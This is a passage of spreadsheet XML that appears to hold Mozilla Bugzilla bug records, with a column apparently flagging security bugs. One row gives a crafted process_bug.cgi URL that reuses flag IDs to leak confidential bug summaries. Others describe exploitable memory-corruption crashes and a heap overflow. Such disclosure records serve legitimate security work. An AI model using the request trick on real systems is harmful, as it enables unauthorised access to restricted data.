      <c r="C5224" t="inlineStr">
        <is>
          <t>Index rename time estimate is too short on large sites</t>
        </is>
      </c>
      <c r="D5224" t="inlineStr">
        <is>
          <t>2005-05-16 16:45:39 -0700</t>
        </is>
      </c>
      <c r="E5224" t="n">
        <v>1</v>
      </c>
      <c r="F5224" t="n">
        <v>1</v>
      </c>
      <c r="G5224" t="n">
        <v>4</v>
      </c>
      <c r="H5224" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5224" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5224" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5224" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L5224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5224" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5224" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5224" t="inlineStr">
        <is>
          <t>[wanted for 2.20]</t>
        </is>
      </c>
      <c r="Q5224" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5224" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5224" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T5224" t="n">
        <v>1</v>
      </c>
      <c r="U5224" t="n">
        <v>0</v>
      </c>
      <c r="V5224" t="n">
        <v>14</v>
      </c>
      <c r="W5224" t="inlineStr">
        <is>
          <t>On an Ultra-80 using a fiber-channel to a SAN, Mysql4.0 with a shadows DB....
Checksetup announces that the index renames will take about 7 minutes.  It takes
more like 5 hours.  This is mainly due to the monster (13GB) attachment table
where mysql creates a temp table for each index dropped and each index created.
I have already tried this with each table write-locked and with keys diasbled on
each table before the renames and neither helps.  Since this is a one-time
issue, I am inclined not to worry too much about optimizing it.  We should just
fix the estimate so large site administrators are warned.</t>
        </is>
      </c>
      <c r="X5224" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5225">
      <c r="A5225" t="n">
        <v>1316712</v>
      </c>
      <c r="B5225" t="inlineStr">
        <is>
          <t>2016-11-10 13:26:32 -0800</t>
        </is>
      </c>
      <c r="C5225" t="inlineStr">
        <is>
          <t>Switch from the Heroku SSL endpoint addon to their new native SNI SSL support</t>
        </is>
      </c>
      <c r="D5225" t="inlineStr">
        <is>
          <t>2017-05-10 10:35:36 -0700</t>
        </is>
      </c>
      <c r="E5225" t="n">
        <v>1</v>
      </c>
      <c r="F5225" t="n">
        <v>1</v>
      </c>
      <c r="G5225" t="n">
        <v>7</v>
      </c>
      <c r="H5225" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5225" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5225" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5225" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5225" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5225" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5225" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5225" t="inlineStr"/>
      <c r="Q5225" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5225" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5225" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5225" t="n">
        <v>1</v>
      </c>
      <c r="U5225" t="n">
        <v>0</v>
      </c>
      <c r="V5225" t="n">
        <v>3</v>
      </c>
      <c r="W5225" t="inlineStr">
        <is>
          <t>Heroku's native SNI-based SSL has been out for a bit now:
https://blog.heroku.com/ssl-is-now-included-on-all-paid-dynos
We should consider switching to it from the SSL endpoint addon.
Pros:
* Doesn't require the $20/month addon
* Copes with spikes in load without needing to pre-warm
* Heroku have said it's recommended over the old SSL endpoint addon, and that new features will only be available on the SNI based solution
* the SNI based solution wasn't affected during the Dyn DDOS, unlike the SSL addon
Cons:
* Requires SNI, so can't be used by people on Windows XP who only have Internet Explorer installed (https://en.wikipedia.org/wiki/Server_Name_Indication#Support)
Switching process:
https://devcenter.heroku.com/articles/ssl#migrate-from-ssl-endpoint-to-heroku-ssl</t>
        </is>
      </c>
      <c r="X5225" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5226">
      <c r="A5226" t="n">
        <v>1355160</v>
      </c>
      <c r="B5226" t="inlineStr">
        <is>
          <t>2017-04-10 11:01:40 -0700</t>
        </is>
      </c>
      <c r="C5226" t="inlineStr">
        <is>
          <t>schedule talos jobs on try for win7, win8 against win 2012 tc builds</t>
        </is>
      </c>
      <c r="D5226" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E5226" t="n">
        <v>1</v>
      </c>
      <c r="F5226" t="n">
        <v>1</v>
      </c>
      <c r="G5226" t="n">
        <v>5</v>
      </c>
      <c r="H5226" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5226" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5226" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5226" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5226" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5226" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5226" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5226" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5226" t="inlineStr"/>
      <c r="Q5226" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5226" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5226" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5226" t="n">
        <v>1</v>
      </c>
      <c r="U5226" t="n">
        <v>0</v>
      </c>
      <c r="V5226" t="n">
        <v>3</v>
      </c>
      <c r="W5226" t="inlineStr">
        <is>
          <t>Could you add a taskcluster config to use BBB and schedule jobs on win8 with the win 2012 build?  likewise we have win7 for the 32 bit builds.  If there were taskcluster jobs on a try pushing using BBB, that would help and we could analyze the data, etc. :)</t>
        </is>
      </c>
      <c r="X5226" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5227">
      <c r="A5227" t="n">
        <v>1310269</v>
      </c>
      <c r="B5227" t="inlineStr">
        <is>
          <t>2016-10-14 10:21:49 -0700</t>
        </is>
      </c>
      <c r="C5227" t="inlineStr">
        <is>
          <t>In-app reset button</t>
        </is>
      </c>
      <c r="D5227" t="inlineStr">
        <is>
          <t>2016-10-20 10:35:38 -0700</t>
        </is>
      </c>
      <c r="E5227" t="n">
        <v>1</v>
      </c>
      <c r="F5227" t="n">
        <v>1</v>
      </c>
      <c r="G5227" t="n">
        <v>2</v>
      </c>
      <c r="H5227" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5227" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J5227" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5227" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5227" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5227" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5227" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5227" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q5227" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5227" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5227" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5227" t="n">
        <v>1</v>
      </c>
      <c r="U5227" t="n">
        <v>0</v>
      </c>
      <c r="V5227" t="n">
        <v>2</v>
      </c>
      <c r="W5227" t="inlineStr">
        <is>
          <t>To help with our privacy story, we can have a button that destroys the active session and resets the browser to the startup state. This bug includes any animations we want to show.</t>
        </is>
      </c>
      <c r="X5227" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5228">
      <c r="A5228" t="n">
        <v>777398</v>
      </c>
      <c r="B5228" t="inlineStr">
        <is>
          <t>2012-07-25 10:09:23 -0700</t>
        </is>
      </c>
      <c r="C5228" t="inlineStr">
        <is>
          <t>[SECURITY] HTML bugmail exposes information about restricted bugs</t>
        </is>
      </c>
      <c r="D5228" t="inlineStr">
        <is>
          <t>2016-11-01 17:02:13 -0700</t>
        </is>
      </c>
      <c r="E5228" t="n">
        <v>1</v>
      </c>
      <c r="F5228" t="n">
        <v>1</v>
      </c>
      <c r="G5228" t="n">
        <v>4</v>
      </c>
      <c r="H5228" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5228" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5228" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K5228" t="inlineStr">
        <is>
          <t>4.1.1</t>
        </is>
      </c>
      <c r="L5228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5228" t="inlineStr"/>
      <c r="Q5228" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5228" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5228" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T5228" t="n">
        <v>1</v>
      </c>
      <c r="U5228" t="n">
        <v>0</v>
      </c>
      <c r="V5228" t="n">
        <v>10</v>
      </c>
      <c r="W5228" t="inlineStr">
        <is>
          <t>html bugmail uses the bug_link filter to linkify 'bug NNN' text, both within comments, and when other bugs are referenced (eg blockers, dependencies).
the bug_link code always tests if the current user has access to the bug it's marking up, and if not, it sets the title to just the bug's status.
however when constructing bugmail, the current user is the user which made the change -- we need to test if to_user has access to the bug.</t>
        </is>
      </c>
      <c r="X5228" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5229">
      <c r="A5229" t="n">
        <v>626775</v>
      </c>
      <c r="B5229" t="inlineStr">
        <is>
          <t>2011-01-18 13:28:19 -0800</t>
        </is>
      </c>
      <c r="C5229" t="inlineStr">
        <is>
          <t>Tab modal dialog spoofing (DOMWillOpenModalDialog + navigation)</t>
        </is>
      </c>
      <c r="D5229" t="inlineStr">
        <is>
          <t>2014-11-19 19:37:28 -0800</t>
        </is>
      </c>
      <c r="E5229" t="n">
        <v>1</v>
      </c>
      <c r="F5229" t="n">
        <v>1</v>
      </c>
      <c r="G5229" t="n">
        <v>3</v>
      </c>
      <c r="H5229" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5229" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5229" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5229" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5229" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5229" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5229" t="inlineStr">
        <is>
          <t>[sg:moderate][fixed-in-bug-611553][adv-main20+]</t>
        </is>
      </c>
      <c r="Q5229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5229" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5229" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T5229" t="n">
        <v>1</v>
      </c>
      <c r="U5229" t="n">
        <v>0</v>
      </c>
      <c r="V5229" t="n">
        <v>17</v>
      </c>
      <c r="W5229" t="inlineStr">
        <is>
          <t>Created attachment 504834
testcase
bug 625187 without iframes.</t>
        </is>
      </c>
      <c r="X5229" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5230">
      <c r="A5230" t="n">
        <v>1409577</v>
      </c>
      <c r="B5230" t="inlineStr">
        <is>
          <t>2017-10-17 16:18:37 -0700</t>
        </is>
      </c>
      <c r="C5230" t="inlineStr">
        <is>
          <t>Add static indexes to decision task</t>
        </is>
      </c>
      <c r="D5230" t="inlineStr">
        <is>
          <t>2017-10-18 19:12:08 -0700</t>
        </is>
      </c>
      <c r="E5230" t="n">
        <v>1</v>
      </c>
      <c r="F5230" t="n">
        <v>1</v>
      </c>
      <c r="G5230" t="n">
        <v>5</v>
      </c>
      <c r="H5230" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5230" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5230" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K5230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5230" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5230" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5230" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5230" t="inlineStr"/>
      <c r="Q5230" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5230" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5230" t="n">
        <v>1</v>
      </c>
      <c r="U5230" t="n">
        <v>0</v>
      </c>
      <c r="V5230" t="n">
        <v>9</v>
      </c>
      <c r="W5230" t="inlineStr">
        <is>
          <t>Ship-it uses branch/revision combination to identify a revision we want to promote as a release. Releaserunner needs to find the corresponding decision task to start an action task. ATM we use only "latest" index for decision tasks. Let's add another one! :)</t>
        </is>
      </c>
      <c r="X5230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5231">
      <c r="A5231" t="n">
        <v>617164</v>
      </c>
      <c r="B5231" t="inlineStr">
        <is>
          <t>2010-12-06 15:30:35 -0800</t>
        </is>
      </c>
      <c r="C5231" t="inlineStr">
        <is>
          <t>Two more talos runs places:c22fccf2af09</t>
        </is>
      </c>
      <c r="D5231" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5231" t="n">
        <v>1</v>
      </c>
      <c r="F5231" t="n">
        <v>1</v>
      </c>
      <c r="G5231" t="n">
        <v>5</v>
      </c>
      <c r="H5231" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5231" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5231" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5231" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5231" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5231" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5231" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5231" t="inlineStr"/>
      <c r="Q5231" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5231" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5231" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5231" t="n">
        <v>1</v>
      </c>
      <c r="U5231" t="n">
        <v>0</v>
      </c>
      <c r="V5231" t="n">
        <v>2</v>
      </c>
      <c r="W5231" t="inlineStr">
        <is>
          <t>I need two more talos runs on this changeset:
http://hg.mozilla.org/projects/places/rev/c22fccf2af09
For all platforms for these suites:
chrome
nochrome
dirty
tp4
cold</t>
        </is>
      </c>
      <c r="X5231" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5232">
      <c r="A5232" t="n">
        <v>293159</v>
      </c>
      <c r="B5232" t="inlineStr">
        <is>
          <t>2005-05-06 09:52:42 -0700</t>
        </is>
      </c>
      <c r="C5232" t="inlineStr">
        <is>
          <t>[SECURITY] Anyone can change flags and access bug summaries due to a bad check in Flag::validate() and Flag::modify()</t>
        </is>
      </c>
      <c r="D5232" t="inlineStr">
        <is>
          <t>2005-07-08 00:10:40 -0700</t>
        </is>
      </c>
      <c r="E5232" t="n">
        <v>1</v>
      </c>
      <c r="F5232" t="n">
        <v>1</v>
      </c>
      <c r="G5232" t="n">
        <v>4</v>
      </c>
      <c r="H5232" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5232" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5232" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5232" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L5232" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5232" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5232" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5232" t="inlineStr">
        <is>
          <t>[does not affect 2.16.x] [ready for 2.18.2] [ready for 2.20]</t>
        </is>
      </c>
      <c r="Q5232" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5232" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5232" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5232" t="n">
        <v>1</v>
      </c>
      <c r="U5232" t="n">
        <v>0</v>
      </c>
      <c r="V5232" t="n">
        <v>16</v>
      </c>
      <c r="W5232" t="inlineStr">
        <is>
          <t>Flag::validate() and Flag::modify() do not check that the flag ID one tries to
change is consistent with the bug ID and/or attachment ID passed to the
function. This way, we are able to access the summary of (almost) any bug which
has flags set on it.
It's very difficult to reproduce if you have no idea of flag IDs set on a given
bug. The idea is the following:
1) hack the URL in order to have something like:
process_bug.cgi?id=196&amp;product=Bugzilla&amp;component=...&amp;flag-481=%3F&amp;requestee-481=guest%40foo.com
Here, the flag with ID = 481 is not related to the public bug 196 but is related
to another (confidential) bug. But as the URL contains the bug ID of a public
bug, neither process_bug.cgi nor Flag::validate() or Flag::modify() will
complain as they all check if the user has access to the given bug or attachment
based on the bug/attachement ID passed in the URL.
2) use the same URL as above, but change flag-481=%3F to flag-481=X.
This way, you cancel the request and the requester (in our case: a bad guy) will
receive an email that this request has been cancelled. But the email contains
the summary of the bug!! &lt;-- Oops!!
Note that you have to use an existing flag which is either set to + or -, else
this trick won't work (if the flag is not specifically requestable!).
Note also that this does not work if you try to create a new flag using
flag_type in the URL instead of flag, because the new flag would be created in
the public bug (the one given in the URL). About this last comment, see also bug
266159.</t>
        </is>
      </c>
      <c r="X5232" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5233">
      <c r="A5233" t="n">
        <v>664635</v>
      </c>
      <c r="B5233" t="inlineStr">
        <is>
          <t>2011-06-15 18:35:57 -0700</t>
        </is>
      </c>
      <c r="C5233" t="inlineStr">
        <is>
          <t>ovi partner repack missing for fennec 5.0</t>
        </is>
      </c>
      <c r="D5233" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5233" t="n">
        <v>1</v>
      </c>
      <c r="F5233" t="n">
        <v>1</v>
      </c>
      <c r="G5233" t="n">
        <v>5</v>
      </c>
      <c r="H5233" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5233" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5233" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5233" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5233" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5233" t="inlineStr">
        <is>
          <t>Maemo</t>
        </is>
      </c>
      <c r="N5233" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5233" t="inlineStr">
        <is>
          <t>[releases][partner-repacks]</t>
        </is>
      </c>
      <c r="Q5233" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5233" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5233" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5233" t="n">
        <v>1</v>
      </c>
      <c r="U5233" t="n">
        <v>0</v>
      </c>
      <c r="V5233" t="n">
        <v>8</v>
      </c>
      <c r="W5233" t="inlineStr">
        <is>
          <t>.</t>
        </is>
      </c>
      <c r="X5233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5234">
      <c r="A5234" t="n">
        <v>494283</v>
      </c>
      <c r="B5234" t="inlineStr">
        <is>
          <t>2009-05-21 15:28:47 -0700</t>
        </is>
      </c>
      <c r="C5234" t="inlineStr">
        <is>
          <t>"ASSERTION: Dead placeholder in placeholder map" and more badness with abs pos, table root</t>
        </is>
      </c>
      <c r="D5234" t="inlineStr">
        <is>
          <t>2013-05-13 13:50:34 -0700</t>
        </is>
      </c>
      <c r="E5234" t="n">
        <v>1</v>
      </c>
      <c r="F5234" t="n">
        <v>1</v>
      </c>
      <c r="G5234" t="n">
        <v>3</v>
      </c>
      <c r="H5234" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5234" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5234" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5234" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5234" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5234" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5234" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5234" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5234" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5234" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T5234" t="n">
        <v>1</v>
      </c>
      <c r="U5234" t="n">
        <v>0</v>
      </c>
      <c r="V5234" t="n">
        <v>26</v>
      </c>
      <c r="W5234" t="inlineStr">
        <is>
          <t>Created attachment 378969
testcase
###!!! ASSERTION: Placeholder relationship should have been torn down; see comments in nsPlaceholderFrame.h: '!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)', file /Users/jruderman/central/layout/generic/nsPlaceholderFrame.cpp, line 132
###!!! ASSERTION: Dead placeholder in placeholder map: 'entry-&gt;placeholderFrame-&gt;GetOutOfFlowFrame() != (void*)0xdddddddd', file /Users/jruderman/central/layout/base/nsFrameManager.cpp, line 135
###!!! ASSERTION: Some objects allocated with AllocateFrame were not freed: 'mFrameCount == 0', file /Users/jruderman/central/layout/base/nsPresShell.cpp, line 681
This is exploitable in the usual way.  It's also really annoying, because the crashes happen all over the place.</t>
        </is>
      </c>
      <c r="X5234" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5235">
      <c r="A5235" t="n">
        <v>870336</v>
      </c>
      <c r="B5235" t="inlineStr">
        <is>
          <t>2013-05-09 05:28:30 -0700</t>
        </is>
      </c>
      <c r="C5235" t="inlineStr">
        <is>
          <t>[traceback] AttributeError: type object 'Document' has no attribute 'get_indexable'</t>
        </is>
      </c>
      <c r="D5235" t="inlineStr">
        <is>
          <t>2013-05-09 08:31:42 -0700</t>
        </is>
      </c>
      <c r="E5235" t="n">
        <v>1</v>
      </c>
      <c r="F5235" t="n">
        <v>1</v>
      </c>
      <c r="G5235" t="n">
        <v>5</v>
      </c>
      <c r="H5235" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5235" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5235" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5235" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5235" t="inlineStr">
        <is>
          <t>u=dev c=wiki p=0 s=2013.9</t>
        </is>
      </c>
      <c r="Q5235" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5235" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5235" t="inlineStr">
        <is>
          <t>2013Q2</t>
        </is>
      </c>
      <c r="T5235" t="n">
        <v>1</v>
      </c>
      <c r="U5235" t="n">
        <v>0</v>
      </c>
      <c r="V5235" t="n">
        <v>5</v>
      </c>
      <c r="W5235" t="inlineStr">
        <is>
          <t>Here it is:
Traceback (most recent call last):
  File "manage.py", line 49, in &lt;module&gt;
    execute_manager(settings)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/__init__.py", line 459, in execute_manager
    utility.execute()
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/__init__.py", line 382, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/base.py", line 196, in run_from_argv
    self.execute(*args, **options.__dict__)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django/django/core/management/base.py", line 232, in execute
    output = self.handle(*args, **options)
  File "/data/support/www/support.mozilla.org/kitsune/vendor/src/django-cronjobs/cronjobs/management/commands/cron.py", line 38, in handle
    registered[script](*args)
  File "/data/support/www/support.mozilla.org/kitsune/apps/wiki/cron.py", line 42, in reindex_kb
    index_task.delay(Document, Document.get_indexable())
AttributeError: type object 'Document' has no attribute 'get_indexable'</t>
        </is>
      </c>
      <c r="X5235" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5236">
      <c r="A5236" t="n">
        <v>744541</v>
      </c>
      <c r="B5236" t="inlineStr">
        <is>
          <t>2012-04-11 12:36:00 -0700</t>
        </is>
      </c>
      <c r="C5236" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in utf16_to_isolatin1</t>
        </is>
      </c>
      <c r="D5236" t="inlineStr">
        <is>
          <t>2012-07-12 08:49:32 -0700</t>
        </is>
      </c>
      <c r="E5236" t="n">
        <v>1</v>
      </c>
      <c r="F5236" t="n">
        <v>1</v>
      </c>
      <c r="G5236" t="n">
        <v>3</v>
      </c>
      <c r="H5236" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5236" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5236" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5236" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5236" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5236" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5236" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-][advisory-tracking+] likely exploitable, but only on Linux/Unix/BSD, and likely only from file: urls (unless window.dump is enabled)</t>
        </is>
      </c>
      <c r="Q5236" t="inlineStr">
        <is>
          <t>--</t>
        </is>
